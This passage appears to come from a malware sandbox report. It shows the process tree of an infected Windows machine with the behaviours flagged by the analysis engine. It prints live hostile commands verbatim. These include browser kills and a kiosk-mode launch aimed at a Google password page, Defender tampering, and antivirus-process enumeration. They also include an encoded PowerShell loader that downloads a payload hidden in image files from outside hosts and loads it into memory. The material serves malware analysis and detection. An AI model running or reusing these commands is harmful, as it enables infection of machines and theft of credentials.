                        taskkill /F /IM firefox.exe /T
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2488
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM chrome.exe /T
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2808
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM msedge.exe /T
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:872
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM opera.exe /T
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2316
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM brave.exe /T
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4592
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                        5⤵
                          PID:860
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                            6⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            • Suspicious use of SetWindowsHookEx
                            PID:4852
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {357d3ac5-c598-427a-82b8-6b41f5b17848} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" gpu
                              7⤵
                                PID:3380
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2456 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07d57306-e3fb-439c-a829-4178539cc335} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" socket
                                7⤵
                                  PID:1168
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3068 -childID 1 -isForBrowser -prefsHandle 2972 -prefMapHandle 1316 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c177159e-fec0-4494-a337-c02d85d6af7a} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab
                                  7⤵
                                    PID:5444
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3628 -childID 2 -isForBrowser -prefsHandle 3548 -prefMapHandle 2824 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {138ecba1-b0e4-4038-b919-561344c77199} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab
                                    7⤵
                                      PID:5568
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4784 -prefMapHandle 4780 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f7aefe2-9e10-4557-959c-fbda96bef28b} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" utility
                                      7⤵
                                      • Checks processor information in registry
                                      PID:5056
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 3 -isForBrowser -prefsHandle 5444 -prefMapHandle 5432 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df8fa119-54d2-420e-9971-98bdbd8c1855} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab
                                      7⤵
                                        PID:5796
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 4 -isForBrowser -prefsHandle 5612 -prefMapHandle 5200 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {531e4f6c-57a7-4d5c-bcff-d7c8194cdcff} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab
                                        7⤵
                                          PID:5832
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5804 -childID 5 -isForBrowser -prefsHandle 5776 -prefMapHandle 5772 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74e5c23f-d9a4-4588-8a11-13254559536c} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab
                                          7⤵
                                            PID:5696
                                    • C:\Users\Admin\AppData\Local\Temp\10148420101\c04f336cff.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148420101\c04f336cff.exe"
                                      4⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4032
                                    • C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5784
                                    • C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1724
                                    • C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:640
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        cmd.exe /c 67cc62a429f2f.vbs
                                        5⤵
                                        • Checks computer location settings
                                        • Modifies registry class
                                        PID:5260
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                                          6⤵
                                          • Checks computer location settings
                                          PID:5112
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1164
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                              8⤵
                                              • Blocklisted process makes network request
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5840
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3420
                                    • C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"
                                      4⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:3600
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5940
                                        • C:\Windows\SysWOW64\expand.exe
                                          expand Ae.msi Ae.msi.bat
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5220
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist
                                          6⤵
                                          • Enumerates processes with tasklist
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2836
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /I "opssvc wrsa"
                                          6⤵
                                            PID:5752
                                          • C:\Windows\SysWOW64\tasklist.exe
                                            tasklist
                                            6⤵
                                            • Enumerates processes with tasklist
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:804
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4896
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c md 789919
                                            6⤵
                                              PID:2700
                                            • C:\Windows\SysWOW64\extrac32.exe
                                              extrac32 /Y /E Deviation.msi
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1464
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                                              6⤵
                                                PID:2488
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:432
                                              • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                                                Occupation.com q
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:5108
                                              • C:\Windows\SysWOW64\choice.exe
                                                choice /d y /t 5
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4180
                                          • C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:4604
                                          • C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"
                                            4⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            PID:4148
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5972
                                              • C:\Windows\SysWOW64\expand.exe
                                                expand Go.pub Go.pub.bat
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4932
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist
                                                6⤵
                                                • Enumerates processes with tasklist
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4408
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /I "opssvc wrsa"
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2868
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist
                                                6⤵
                                                • Enumerates processes with tasklist
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3132
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                                6⤵
                                                  PID:444
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c md 353090
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4584
                                                • C:\Windows\SysWOW64\extrac32.exe
                                                  extrac32 /Y /E Really.pub
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3336
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V "posted" Good
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2524
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                                                  6⤵
                                                    PID:4932
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1664
                                                  • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                                                    Seat.com m
                                                    6⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:5664
                                                    • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                      C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:7384
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 1384
                                                        8⤵
                                                        • Program crash
                                                        PID:9308
                                                  • C:\Windows\SysWOW64\choice.exe
                                                    choice /d y /t 5
                                                    6⤵
                                                      PID:2524
                                                • C:\Users\Admin\AppData\Local\Temp\10148500101\CgmaT61.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10148500101\CgmaT61.exe"
                                                  4⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6680
                                                • C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:6152
                                                  • C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe"
                                                    5⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6308
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 800
